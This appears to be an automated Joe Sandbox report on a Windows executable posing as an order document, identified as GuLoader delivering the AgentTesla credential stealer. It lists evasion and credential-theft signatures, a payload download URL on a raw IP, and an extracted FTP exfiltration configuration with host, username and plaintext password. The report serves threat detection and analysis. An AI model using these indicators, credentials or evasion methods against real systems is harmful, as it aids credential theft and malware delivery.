Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Order NO 000293988494948595850000595995000.exe

Overview

General Information

Sample name:Order NO 000293988494948595850000595995000.exe
Analysis ID:1568069
MD5:52131cce80de6868d4eb452ec3bcb91b
SHA1:4ce48ce0ac577aa4008359cc9178dfb1e9e95f25
SHA256:935cbed36f8d1f6e18a988bc200c075039f4dc6ffb1a87e1a72c9f8b393fe4fa
Tags:exeuser-lowmal3
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected GuLoader
AI detected suspicious sample
Initial sample is a PE file and has a suspicious name
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Exfil Mode": "FTP", "Host": "ftp://ftp.concaribe.com", "Username": "testi@concaribe.com", "Password": "ro}UWgz#!38E"}
SourceRuleDescriptionAuthorStrings
0000000B.00000002.3726491154.0000000034FAC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    0000000B.00000002.3726491154.0000000034F81000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      0000000B.00000002.3726491154.0000000034F81000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000000.00000002.2416834766.0000000004E77000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: Order NO 000293988494948595850000595995000.exe PID: 7972JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 1 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-04T09:23:15.283334+010028032702Potentially Bad Traffic192.168.2.749946109.248.150.25280TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: http://ftp.concaribe.comAvira URL Cloud: Label: malware
            Source: http://concaribe.comAvira URL Cloud: Label: malware
            Source: Order NO 000293988494948595850000595995000.exe.7972.11.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.concaribe.com", "Username": "testi@concaribe.com", "Password": "ro}UWgz#!38E"}
            Source: Order NO 000293988494948595850000595995000.exeVirustotal: Detection: 18%Perma Link
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: Order NO 000293988494948595850000595995000.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.7:49954 version: TLS 1.2
            Source: Order NO 000293988494948595850000595995000.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeDirectory queried: number of queries: 1001
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeCode function: 0_2_004069FF FindFirstFileW,FindClose,0_2_004069FF
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeCode function: 0_2_00405DAE CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405DAE
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeCode function: 0_2_00402930 FindFirstFileW,0_2_00402930
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeCode function: 11_2_00402930 FindFirstFileW,11_2_00402930
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeCode function: 11_2_004069FF FindFirstFileW,FindClose,11_2_004069FF
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeCode function: 11_2_00405DAE CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,11_2_00405DAE
            Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
            Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
            Source: Joe Sandbox ViewIP Address: 192.185.13.234 192.185.13.234
            Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49946 -> 109.248.150.252:80
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /CoefvoxbOhqqwMfAyfMH15.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 109.248.150.252Cache-Control: no-cache
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /CoefvoxbOhqqwMfAyfMH15.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 109.248.150.252Cache-Control: no-cache
            Source: global trafficDNS traffic detected: DNS query: api.ipify.org
            Source: global trafficDNS traffic detected: DNS query: ftp.concaribe.com
            Source: Order NO 000293988494948595850000595995000.exe, 0000000B.00000002.3725718642.00000000341F0000.00000004.00001000.00020000.00000000.sdmp, Order NO 000293988494948595850000595995000.exe, 0000000B.00000002.3705946618.0000000004B54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://109.248.150.252/CoefvoxbOhqqwMfAyfMH15.bin
            Source: Order NO 000293988494948595850000595995000.exe, 0000000B.00000002.3705946618.0000000004B54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://109.248.150.252/CoefvoxbOhqqwMfAyfMH15.binK
            Source: Order NO 000293988494948595850000595995000.exe, 0000000B.00000002.3726491154.0000000034FAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://concaribe.com
            Source: Order NO 000293988494948595850000595995000.exe, 0000000B.00000002.3726491154.0000000034FAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.concaribe.com
            Source: Order NO 000293988494948595850000595995000.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: Order NO 000293988494948595850000595995000.exe, 0000000B.00000002.3726491154.0000000034F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Order NO 000293988494948595850000595995000.exe, 0000000B.00000002.3726491154.0000000034F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
            Source: Order NO 000293988494948595850000595995000.exe, 0000000B.00000002.3726491154.0000000034F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
            Source: Order NO 000293988494948595850000595995000.exe, 0000000B.00000002.3726491154.0000000034F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
            Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
            Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.7:49954 version: TLS 1.2
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeCode function: 0_2_00405866 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405866

            System Summary

            barindex
            Source: initial sampleStatic PE information: Filename: Order NO 000293988494948595850000595995000.exe
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeCode function: 0_2_00403665 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403665
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeCode function: 11_2_00403665 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,11_2_00403665
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeCode function: 0_2_00406DC00_2_00406DC0
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeCode function: 0_2_74331BFF0_2_74331BFF
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeCode function: 11_2_00406DC011_2_00406DC0
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeCode function: 11_2_0012B21D11_2_0012B21D
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeCode function: 11_2_0012E36011_2_0012E360
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeCode function: 11_2_00124A5811_2_00124A58
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeCode function: 11_2_00123E4011_2_00123E40
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeCode function: 11_2_0012417D11_2_0012417D
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeCode function: 11_2_0012418811_2_00124188
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeCode function: 11_2_3820BB9011_2_3820BB90
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeCode function: 11_2_3820A7DC11_2_3820A7DC
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeCode function: 11_2_3821315811_2_38213158
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeCode function: 11_2_3821C24011_2_3821C240
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeCode function: 11_2_3821B2F011_2_3821B2F0
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeCode function: 11_2_382156A011_2_382156A0
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeCode function: 11_2_3821004011_2_38210040
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeCode function: 11_2_3821237011_2_38212370
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeCode function: 11_2_3821E46811_2_3821E468
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeCode function: 11_2_38215DB711_2_38215DB7
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeCode function: 11_2_3821776011_2_38217760
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeCode function: 11_2_385E2B9811_2_385E2B98
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeCode function: 11_2_3821001C11_2_3821001C
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeCode function: String function: 00402DCB appears 51 times
            Source: Order NO 000293988494948595850000595995000.exe, 0000000B.00000002.3726125231.0000000034D89000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Order NO 000293988494948595850000595995000.exe
            Source: Order NO 000293988494948595850000595995000.exe, 0000000B.00000002.3705946618.0000000004B54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Order NO 000293988494948595850000595995000.exe
            Source: Order NO 000293988494948595850000595995000.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/7@2/3
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeCode function: 0_2_00403665 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403665
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeCode function: 11_2_00403665 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,11_2_00403665
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeCode function: 0_2_00404B12 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404B12
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeCode function: 0_2_004021CF CoCreateInstance,0_2_004021CF
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeFile created: C:\Users\user\AppData\Roaming\PremolderJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeMutant created: NULL
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsxCD55.tmpJump to behavior
            Source: Order NO 000293988494948595850000595995000.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Order NO 000293988494948595850000595995000.exeVirustotal: Detection: 18%
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeFile read: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe "C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe"
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess created: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe "C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe"
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess created: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe "C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeSection loaded: wintypes.dllJump to behavior
